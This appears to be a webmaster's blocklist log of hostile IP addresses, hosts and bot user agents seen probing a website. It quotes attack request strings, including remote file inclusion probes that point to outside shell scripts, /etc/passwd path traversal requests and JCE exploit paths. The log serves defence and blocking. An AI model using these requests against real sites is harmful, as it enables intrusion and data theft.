Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/vito.php?rf
50.2.225.11 Host: United States – Phoenix Serverhub
Web server: 1 website – healthyplannow.com
Spam bot
User agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/27.0.1453.116 Safari/537.36
217.160.6.66 Hostname: dialog21.de
Host: Germany – Karlsruhe 1&1 Internet Ag
Web server: 74 websites
Hacker bot looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) //images/stories/petx.gif
89.40.71.2 Hostname: shared1.indicii.ro
Host: Romania – Vaslui Clues On It Srl
Web server: 119 websites
Hacker bot – Looking for osCommerce/Zencart exploit vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
Known hacker botnet user agent:
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
176.43.199.131 Hostname: host-176-43-199-130.reverse.superonline.net
Host: Turkey – Istanbul Tellcom Fiber Dynamic
Hacker bot – Dictionary attack on WordPress admin
173.243.120.37 Hostname: rdns.yourcpanelserver.com
Host: United States – Lenoir Ajay Kumar
Hacker bot scanning for Open Flash Chart exploits
//components/com_jnews/includes/openflashchart/tmp-upload-images/guys.php?rf
Malicious user agent: libwww-perl/5.805
68.43.96.242 Hostname: c-68-43-96-242.hsd1.mi.comcast.net
Host: United States – Taylor Comcast Cable Communications Inc.
Banned bot: Gigabot
User agent: Gigabot/3.0 (http: //www.gigablast.com/spider.html)
71.72.18.97 Hostname: cpe-71-72-18-97.neo.res.rr.com
Host: United States – Cleveland Time Warner Cable Internet Llc
SEOENGWorldBot
User agent: SEOENGWorldBot/1.0 (+http: //www.seoengine.com/seoengbot.htm)
81.92.221.101 Hostname: x-200-75.fasturl.net
Host: Portugal – Leiria Nfsi Telecom Lda.
Web server: 159 websites
Hacker bot scanning for shell RFI exploits
1) /includes/adodb/back/adodb-postgres7.inc.php?ADODB_DIR=http: //www.google.com/humans.txt?
2) /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http: //www.google.com/humans.txt?
3) /nukebrowser.php?filnavn=http://www.google.com/humans.txt?filhead=http: //www.google.com/humans.txt?&cmd=id
4}/[path]/mybic_server.php?file=http: //www.google.com/humans.txt?
6) /modules/Forums/admin/admin_styles.php?phpbb_root_path=http: //www.google.com/humans.txt?
7) /sendstudio/admin/includes/createemails.inc.php?ROOTDIR=http: //www.google.com/humans.txt?
8) /inhalt.php?dateien[news]=http: //www.google.com/humans.txt?
9) /PHPDJ_v05/dj/djpage.php?page=http: //www.google.com/humans.txt?
10) /NuclearBB/tasks/send_queued_emails.php?root_path=http: //www.google.com/humans.txt?
Many others
188.240.48.2 Host: Romania – Bucharest Appnor Msp Sa
Web server: 1 website – gdgs.ro
Hacker bot scanning for shell RFI exploits
1) /includes/adodb/back/adodb-postgres7.inc.php?ADODB_DIR=http: //www.google.com/humans.txt?
2) /index.php?url=http: //www.google.com/humans.txt?
3) /nukebrowser.php?filnavn=http: //www.google.com/humans.txt?filhead=http: //www.google.com/humans.txt?&cmd=id
4}/index.php?mosConfig_absolute_path=http: //www.google.com/humans.txt?5)/modules/My_eGallery/public/displayCategory.php?basepath=http: //www.google.com/humans.txt?
6) /administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http: //www.google.com/humans.txt?
7) /adm/krgourl.php?DOCUMENT_ROOT=http: //www.google.com/humans.txt?
8) /visitor.php?_SERVER[DOCUMENT_ROOT]=http: //www.google.com/humans.txt??
9) /account.php?insPath=http: //www.google.com/humans.txt?
10) /run.php?dir=SHELL?&file=http: //www.google.com/humans.txt?
Many others
204.73.200.75 Hostname: x-200-75.fasturl.net
Host: United States – New York City Fasturl Inc.
Web server: 79 websites
Hacker bot looking for PHP exploits
1) /pma/scripts/setup.php
2) /myadmin/scripts/setup.php
3) /phpMyAdmin/scripts/setup.php
75.127.110.27 Hostname: web.server.MX.relay.75.127.110.27-static.reverse.yourdnshost.com
Host: United States – Atlanta Global Net Access Llc
Web server: 181 websites
Hacker boy scanning for shell RFI exploits
1) /includes/adodb/back/adodb-postgres7.inc.php?ADODB_DIR=http: //www.google.com/humans.txt?
2) /index.php?url=http: //www.google.com/humans.txt?
3) /nukebrowser.php?filnavn=http: //www.google.com/humans.txt?filhead=http: //www.google.com/humans.txt?&cmd=id
4}/index.php?mosConfig_absolute_path=http: //www.google.com/humans.txt?5)/modules/My_eGallery/public/displayCategory.php?basepath=http: //www.google.com/humans.txt?
6) /administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http: //www.google.com/humans.txt?
7) /adm/krgourl.php?DOCUMENT_ROOT=http: //www.google.com/humans.txt?
8) /visitor.php?_SERVER[DOCUMENT_ROOT]=http ://www.google.com/humans.txt??
9) /account.php?insPath=http: //www.google.com/humans.txt?
10) /run.php?dir=SHELL?&file=http: //www.google.com/humans.txt?
Many others
54.221.186.8 Hostname: ec2-54-221-186-8.compute-1.amazonaws.com
Host: United States – Ashburn Amazon.com Inc.
Proximic.com commercial spy bot “”brand protection services”
User agent: Mozilla/5.0 (compatible; proximic; +http: //www.proximic.com/info/spider.php)
31.169.80.180 Hostname: win1.ilkeiletisim.com
Host: Turkey – Istanbul Netfactor Telekominikasyon Ve Teknoloji Hizmetleri Sanayi Ve Jsc
Web server: 70 websites
Hacker bot – looking for admin exploits
/wp-login.php
/administrator/index.php
/admin.php
194.109.22.88 Host: Netherlands – Amsterdam Xs4all Servers Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/food.php?rf
46.109.176.169 Host: Latvia – Riga Address Pool For Ltc-home Customers Scanning for index.php
5.135.143.42 Hostname: ns2340621.ovh.net
Host: France – Roubaix Ovh Systems
Web server: 102 websites
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
94.123.146.165 Host: Turkey – Ankara Dogan Tv Digital Platform Isletmeciligi A.s Hacker bot – Dictionary attack on WordPress admin
5.9.2.166 Hostname: mail.russianb2b.com
Host: Germany – Nuremberg Hetzner Online Ag
Web server: 58 websites
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/food.php?rf
189.13.74.84 Hostname: 189-13-74-84.user.veloxzone.com.br
Host: Brazil – Rio De Janeiro Telemar Norte Leste S.a.
Hacker looking for phpmyadmin axploits
176.31.7.194 Host: France – Roubaix Ovh Systems Spammer
Banned host
64.207.187.243 Hostname: lqby-x2jg.accessdomain.com
Host: United States – Culver City Media Temple Inc.
Web server: 56 websites
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/vito.php?rf
99.53.98.27 Hostname: 99-53-98-27.lightspeed.cyprtx.sbcglobal.net
Host: United States – Cypress AT&T Internet Services
Web server: 6 websites
Hacker bot – Looking for wpOnlineStore/osCommerce/Zencart exploit vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
Known hacker botnet user agent:
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
37.59.144.179 Host: France – Roubaix Ovh Systems Spammer
Banned host: Roubaix Ovh Systems
98.131.1.231 Host: United States – Columbus Ecommerce Corporation
Web server: 8 websites
Hacker bot – Looking for wpOnlineStore/osCommerce/Zencart exploit vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
Fake Googlebot user agent
106.120.173.74 Hostname: 74.173.120.106.static.bjtelecom.net
Host: China – Beijing Chinanet Beijing Province Network
Banned bot: Sogou spider
User agents:
New-Sogou-Spider/1.0 (compatible; MSIE 5.5; Windows 98)
Sogou web spider/4.0(+http: //www.sogou.com/docs/help/webmasters.htm#07)
151.237.177.157 Host: Sweden – Stockholm Deepak Mehta Fie
Web server: 3 websites – cheapmkonsale.com , raybanoutletzone.net , tomsshoescenter.net
Spam bot
50.63.184.242 Hostname: ip-50-63-184-242.ip.secureserver.net
Host: United States – Scottsdale Godaddy.com Llc
Web server: 3 websites – enetcentral2.com , enetrecruiter.com , enetrecruiters.com
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /images/stories/food.php?rf
83.54.46.209 Hostname: 209.Red-83-54-46.dynamicIP.rima-tde.net
Host: Spain – Madrid Telefonica De Espana Sau
Banned bot: Xenu Link Sleuth/1.3.8
217.195.202.53 Hostname: static-217-195-202-53.fibersunucu.com.tr
Host: Turkey – Istanbul Fibersunucu Internet Hizmetleri Ugur Pala
Spammer
139.195.65.184 Host: Indonesia – Jakarta Pt. First Media Tbk Spammer
37.59.141.215 Host: France – Roubaix Ovh Systems Spammer
Banned host
173.214.171.146 Host: United States – Secaucus Interserver Inc
Web server: 40 websites
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/config.inc.php?rf
83.235.249.42 Hostname: webmail.etean.com.gr
Host: Greece – Athens
Banned scraper bot: WWW-Mechanize/1.72
50.23.194.66 Hostname: server1.dattaserver.com
Host: United States – Dallas Softlayer Technologies Inc.
Web server: 1 website – dattaserver.com
Hacker botnet – Dictionary attack on WordPress admin
50.22.12.14 Hostname: 50.22.12.14-static.reverse.softlayer.com
Host: United States – Dallas Softlayer Technologies Inc.
Web server: 520 websites
Hacker botnet – Dictionary attack on WordPress admin
41.78.28.120 Host: South Africa – Grahamstown Alexandre Miller Cc T/a Imaginet
Web server: 1751 websites
Hacker botnet – Dictionary attack on WordPress admin
41.204.202.46 Hostname: www46.cpt2.host-h.net
Host: South Africa – Johannesburg Hetzner (pty) Ltd
Web server: 252 websites
Hacker botnet – Dictionary attack on WordPress admin
41.203.18.61 Hostname: www61.jnb2.host-h.net
Host: South Africa – Johannesburg Hetzner (pty) Ltd
Web server: 227 websites
Hacker botnet – Dictionary attack on WordPress admin
41.203.16.98 Host: South Africa – Johannesburg Hetzner (pty) Ltd
Web server: 492 websites
Hacker botnet – Dictionary attack on WordPress admin
216.120.249.201 Hostname: host119.hrwebservices.net
Host: United States – Clifton Park Hostrocket Web Services
Web server: 1 website – brainfutures.com
Hacker botnet – Dictionary attack on WordPress admin
199.168.189.126 Hostname: server.bludomain5.net
Host: United States – Orlando Hostdime.com Inc.
Web server: 262 websites
Hacker botnet – Dictionary attack on WordPress admin
193.33.187.66 Host: United Kingdom – Kent Racksrv Communications Limited
Web server: 518 websites
Hacker botnet – Dictionary attack on WordPress admin
190.210.204.137 Host: Argentina – Buenos Aires Nss S.a.
Web server: 752 websites
Hacker botnet – Dictionary attack on WordPress admin
103.9.64.110 Hostname: lamp1.cloudsites.net.au
Host: Australia – Victoria Park The Trustee For For The Collins Family Trust
Web server: 165 websites
Hacker botnet – Dictionary attack on WordPress admin
103.9.100.211 Hostname: icefish.vodien.com
Host: Singapore – Vodien Internet Solutions Pte Ltd
Web server: 586 websites
Hacker botnet – Dictionary attack on WordPress admin
190.120.233.47 Host: Panama – Infolink Panama Corp
Web server: 14 websites
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) //images/stories/explore.gif
71.62.109.144 Hostname: c-71-62-109-144.hsd1.va.comcast.net
Host: United States – Richmond Comcast Cable Communications Holdings Inc
Banned bot: WWW-Mechanize/1.73
213.169.68.38 Hostname: agrocond.naverex.kiev.ua
Host: Ukraine – Kiev Navigator Online Tov
Hacker bot looking for admin exploits
190.96.85.95 Hostname: traact.cl
Host: Chile – Santiago Manquehuenet
Web server: 17 websites
Hacker bot – Looking for wpOnlineStore/osCommerce/Zencart exploit vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
Malicious bot user agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2)
Gecko/20100115 Firefox/3.6
59.120.113.230 Hostname: 59-120-113-230.HINET-IP.hinet.net
Host: Taiwan – Kaohsiung Data Communication Business Group
Hacker bot – Looking for wpOnlineStore/osCommerce/Zencart exploit vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
Malicious bot user agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2)
Gecko/20100115 Firefox/3.6
199.204.248.107 Hostname: s107.n248.n204.n199.static.myhostcenter.com
Host: United States – Columbus Jumpline Inc
Web server: 1106 websites
Hacker bot looking for admin exploits
23.19.46.53 Hostname: c-23-19-46-53.hsd1.az.comcast.net
Host: United States – Phoenix Nobis Technology Group Phoenix
Banned spammer user agent:
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)
Trying to register with non-existent link – direct access attempt, no other page loaded
Banned host: Nobis Technology Group
177.22.119.110 Hostname: POC.MINAS.netsi.com.br
Host: Brazil – Pouso Alegre Tobias Freitas De Souza
Hacker – Dictionary attack on WordPress admin
46.255.160.252 Hostname: 46-255-160-252.phpnet.fr
Host: France – Grenoble Phpnet France Premium
Web server: 1 website – galix-chausseur.com
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/3xp.php
83.222.126.42 Host: United States – Reston Digitalone Ag Colocation And Dedicated Servers
Web server: 9 websites
Malicious user agents:
1) python-requests/2.0.0 CPython/2.7.3 Linux/3.2.0-23-generic
2) Python-urllib/2.7
197.221.61.85 Hostname: rslr01.webtelhosting.co.za
Host: South Africa – Johannesburg Hetzner (pty) Ltd
Web server: 59 websites
Hacker – Looking for wpOnlineStore/osCommerce/Zencart exploit vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
Malicious user agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2)
Gecko/20100115 Firefox/3.6
64.131.77.252 Host: United States – Reston Servint
Web server: 10 websites
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
198.27.82.155
198.27.66.38
Hostname: crawl-198-27-82-155.meanpathbot.com
Host: Canada – Montreal Ovh Hosting Inc.
Meanpathbot. Claims to index website source code; HTML, CSS and JavaScript
Why would anyone want their CSS and JS indexed?
User agent: Mozilla/5.0 (compatible; meanpathbot/1.0; +http://www.meanpath.com/meanpathbot.html)
208.77.221.210 Host: Australia – Chatswood Reed Business Information Pty Ltd Business information bot – CatchBot
CatchBot/5.0; +http: //www.catchbot.com
Rule breaker – does not get robots.txt
77.75.73.17 Hostname: fulltextrobot-77-75-73-17.seznam.cz
Host: Czech Republic – Prague Seznam.cz A.s.
Banned bot
User agent: SeznamBot/3.0 (+http://fulltext.sblog.cz/)
37.59.28.91 Hostname: ns3327715.ovh.net
Host: France Roubaix Ovh Systems
Web server: 15 websites
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20Heavy attack hits sites about every second
195.22.101.5 Hostname: server84.icehosting.nl
Host: Netherlands – Enschede Interracks C.v.
Web server: 261 websites
Spammer – looking for non-existent xmlrpc.php
176.28.8.81 Hostname: hecustomer01.ctseuro.com
Host: Germany – Koeln Hosteurope Gmbh
Web server: 19 websites
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/vito.php?rf
199.58.163.139 Hostname: apollo.medialayer.net
Host: United States – Ashburn Medialayer Llc
Web server: 153 websites
Hacker – looking for RFI exploits
/?_SERVER[DOCUMENT_ROOT]=http://www.google.com/humans.txt?
/?_CONFIG[files][functions_page]=http://www.google.com/humans.txt?
/[path]/mybic_server.php?file=http://www.google.com/humans.txt?
/impex/ImpExData.php?systempath=http://www.google.com/humans.txt?
/index.php?module=PostWrap&page=http://www.google.com/humans.txt?
97.74.127.145 Hostname: ip-97-74-127-145.ip.secureserver.net
Host: United States – Scottsdale Godaddy.com Llc
Web server: 1 website – r3f3r.com
Hacker – Dictionary attack on WordPress admin
207.58.129.164 Hostname: vps.bornis.net
Host: United States – Reston Servint
Web server: 20 websites
Hacker – Dictionary attack on WordPress admin
108.166.84.135 Hostname: 108-166-84-135.static.cloud-ips.com
Host: United States – San Antonio Slicehost
Web server: 23 websites
Hacker – Dictionary attack on WordPress admin
69.64.61.73 Hostname: dewa.rumahbagus.com
Host: United States – Saint Louis Hosting Solutions International Inc.
Web server: 484 websites
Hacker – Dictionary attack on WordPress admin
72.29.78.36 Hostname: manu30.manufrog.com
Host: United States – Orlando Hostdime.com Inc.
Web server: 291 websites
Hacker – Dictionary attack on WordPress admin
37.122.210.63 Hostname: vps85249797.123-vps.co.uk
Host: United Kingdom – Derby Webfusion Internet Solutions
Web server: 3 websites
Hacker – Dictionary attack on WordPress admin
70.38.54.242 Hostname: ns1.vizualtech.com
Host: Canada – Montreal Iweb Dedicated Cl
Web server: 21 websites
Hacker – Dictionary attack on WordPress admin
199.101.50.131 Hostname: www .lapsonmexico.com
Host: United States – Clifton Park Dotblock.com
Web server: 4 websites
Hacker – Dictionary attack on WordPress admin
109.235.58.169 Hostname: 109-235-58-169.ifo.net
Host: Austria – Vautron Rechenzentrum Ag
Web server: 70 websites
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/food.php?rf
54.197.143.42 Hostname: ec2-54-197-143-42.compute-1.amazonaws.com
Host: United States – Ashburn Amazon.com Inc.
Cliqzbot
Another trash bot hosted on Amazon Web Sevices
94.177.98.230 Hostname: alarmadi.pl
Host: Poland – Zebrzydowice Fhu Alarmadi
Web server: 42 websites
Hacker – attack on WordPress admin
94.177.98.230 Host: Romania – Baia Mare Globe Hosting Ltd
Web server: 1 website – inpascani.ro
Hacker – attack on WordPress admin
94.120.199.89 Host: Turkey – Istanbul Dogan Tv Digital Platform Isletmeciligi A.s Hacker – dictionary attack on WordPress with user-name admin
70.40.219.163 Hostname: 70-40-219-163.unifiedlayer.com
Host: United States – Temecula Unified Layer
Web server: 4 websites
Some sort of bot without a user agent ID
Looked for admin vulnerabilities incl:
/administrator/index.php
/wp-login.php
50.62.41.168 Hostname: ip-50-62-41-168.ip.secureserver.net
Host: United States – Scottsdale Godaddy.com Llc
Web server: 1 website – ibnsoftware.com
Hacker: Dictionary attack on WordPress login with user name admin
50.62.42.245 Hostname: ip-50-62-42-245.ip.secureserver.net
Host: United States – Scottsdale Godaddy.com Llc
Web server: 10 websites
Hacker: Dictionary attack on WordPress login with user name admin
103.10.116.239 Host: India – Shiliguri Siliguri Internet & Cable Tv Pvt. Ltd. Hacker / spammer looking for admin exploits:
/administrator/index.php
/wp-login.php
/admin.php
112.207.37.195 Hostname: 112.207.37.195.pldt.net
Host: Philippines – Sampaloc Pldt Clac10ki01 Dhcp
Hacker / spammer looking for admin exploits:
/administrator/index.php
/wp-login.php
/admin.php
204.12.247.162 Host: United States – Kansas City Zhou Pizhong Banned bot: MJ12bot
User agent: Mozilla/5.0 (compatible; MJ12bot/v1.4.4; http: //www.majestic12.co.uk/bot.php?+)
217.170.200.123 Hostname: server1.studiofx.no
Host: Norway – Oslo Servetheworld As
Web server: 3 websites
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/food.php?rf
88.198.43.215 Host: Germany – Nuremberg Hetzner Online Ag
Web server: 4 websites
Banned bots: WWW-Mechanize/1.73
120.28.125.66 Host: Philippines – Marikina Gbb San Juan Banned bot: Xenu Link Sleuth/1.3.8
176.28.48.168 Hostname: rs206095.rs.hosteurope.de
Host: Germany – Koeln Host Europe Gmbh
Web server: 189 websites
Hacker looking for various Open Flash Chart exploits
Examples:
//administrator/components/com_maian15/charts/tmp-upload-images/vito.php?rf
//admin_area/charts/tmp-upload-images/vito.php?rf
/articles/wp-content/plugins/seo-watcher/ofc/tmp-upload-images/vito.php?rf
User agents:
libwww-perl/5.834
Microsoft Internet Explorer/4.0b1 (Windows 95)
91.250.84.75 Hostname: rs204598.rs.hosteurope.de
Host: Germany – Koeln Host Europe Gmbh
Web server: 31 websites
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/food.php?rf
83.169.35.187 Host: Germany – Koeln Host Europe Gmbh
Web server: 76 websites
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/food.php?rf
80.66.63.90 Hostname: admin.vipweb.at
Host: Austria – Vienna Linznet Internet Service Provider Gmbh
Web server: 808 websites
Spammer
Multiple failed hits on xmlrpc.php
194.150.113.81 Hostname: nixweb01.dandomain.dk
Host: Denmark – Randers Dandomain
Web server: 655 websites
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/food.php?rf
193.136.230.22 Hostname: paloma.isr.uc.pt
Host: Portugal – Coimbra Fundacao Para A Ciencia E A Tecnologia I.p.
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agent:
1) BOT/0.1 (BOT for JCE)
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
50.2.225.160 Host: United States – Henderson Serverhub Cloud Ovz Dallas Spammer
Multiple attempts to register user account and post content
/node/add
/?q=user/register
37.59.43.124 Hostname: ns399284.ip-37-59-43.eu
Host: France – Roubaix Ovh Systems
Web server: 33 websites
Hacker: Remote File Inclusion attempt / WordPress GD Star Ratings plugin RFI exploit:
//wp-content/gd-star-rating/?src=http%3A%2F%2Fwordpress.com.timsagida.com.tr%2Fshellx.php
Known hacker botnet user agent:
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28
82.165.137.20 Hostname: s16505052.onlinehome-server.info
Host: Germany – Karlsruhe 1&1 Internet Ag
Web server: 112 websites
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/borong.gif
70.38.27.172 Host: Canada – Montreal Lise Watier Cosmetiques Inc. Hacker: Remote File Inclusion attempt / WordPress timthumb RFI exploit:
/xmlrpc.php%22%20/%3E%20%3C!–%5Bif%20lt%20IE%209%5D%3E%3Cscript%20src=%22DOMAIN/wp-content/themes/d5-business-line/framework/timthumb.php?src=http://wordpress.com.pinoypc.net/dlc.phpMultiple fake user agents:
Mozilla/5.0 (compatible;bingbot/2.0;+http: //www.bing.com/bingbot.htm)
Gigabot/3.0 (http: //www.gigablast.com/spider.html)
Mozilla/5.0 (compatible; Googlebot/2.1; +http: //www.google.com/bot.html)
Mozilla/5.0 (compatible;Baiduspider/2.0;+http: //www.baidu.com/search/spider.html)
FreeWebMonitoring SiteChecker/0.1 (+http: //www.freewebmonitoring.com)
Sogou web spider/4.0(+http: //www.sogou.com/docs/help/webmasters.htm#07)
173.78.205.252 Hostname: pool-173-78-205-252.tampfl.fios.verizon.net
Host: United States – Tampa Verizon Online Llc
Spammer.
Fake user agent: Mozilla/5.0 (compatible; Googlebot/2.1; http: //www.google.com/bot.html)
Spambot user agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 99; BBOT 1.0)
79.142.67.54 Hostname: hosted-by.altushost.com
Host: Netherlands – Amsterdam Altushost B.v.
Web server: 22 websites
Brute force admin attack
/dnet_admin/index.php?edit_id=2&_p=2&type=../../../../../../../../etc/passwd%00
/includes/masthead.inc.php?template_path=../../../../../../../../../../etc/passwd%00
/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd%00
More
66.187.74.100 Host: United Kingdom London Privax Ltd
(The Optimal Link Corporation)
Xenu Link Sleuth/1.3.8
82.145.46.102 Host: United Kingdom – Maidenhead Iomart Hosting Limited aiHitBot
Business information scraper
Mozilla/5.0 (compatible; aiHitBot/2.8; +http://endb-consolidated.aihit.com/)
122.201.82.82 Hostname: host.emotionserver1.com.au
Host: Australia – Sydney Net Logistics Pty. Ltd.
Web server: 126 websites
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/vito.php?rf
146.48.81.119 Hostname: silabsrv.isti.cnr.it
Host: Italy – Pisa Consiglio Nazionale Delle Ricerche
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/config.inc.php?rf
80.39.185.196 Hostname: 196.Red-80-39-185.dynamicIP.rima-tde.net
Host: Spain – Madrid Telefonica De Espana Sau
Hacker looking for admin exploit
/administrator/index.php
Malicious user agent: Mozilla/3.0 (compatible; Indy Library)
95.130.14.144 Hostname: vm004.webigniter.eu
Host: France – Paris Digicube Sas
Web server: 1 website – mitambo2.com
Mitambo Crawler bot
“SEO” spy bot
Does not get robots.txt
User agent: Mozilla/* AppleWebKit/* Chrome/* Safari/* (Mitambo crawler http: //www.mitambo.com/info-webmasters)
62.98.186.72 Hostname: ppp-72-186.98-62.inwind.it
Host: Italy – Roma Wind Telecomunicazioni Spa
Hacker looking for admin exploit
/administrator/index.php
Malicious user agent: Mozilla/3.0 (compatible; Indy Library)
95.110.225.22 Hostname: host22-225-110-95.serverdedicati.aruba.it
Host: Italy – Arezzo Aruba S.p.a.
Web server: 26 websites
Unidentified bot looking for non-existent URLs
176.61.139.154 Hostname: ns1.vidaemcristo.com.br
Host: Sweden – Braas Deepak Mehta Fie
Comment spammer
/comment/function(
184.171.254.93 Hostname: ns1.vidaemcristo.com.br
Host: United States – Orlando Hostdime.com Inc.
Web server: 3 websites
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/food.php?rf
107.6.95.9
107.6.95.10
107.6.95.11
107.6.95.18
107.6.95.13
107.6.95.14
107.6.95.15
107.6.95.16
107.6.95.18
107.6.95.19
107.6.95.20
107.6.95.21
107.6.95.22
107.6.95.42
107.6.95.122
Hostname: secure.onavo.com
Host: United States – Lewisville Voxel Dot Net Inc.
ICAP-IOD Bot
Ignores robots.txt
Crawling for images – no other content
85.241.204.112 Hostname: bl8-204-112.dsl.telepac.pt
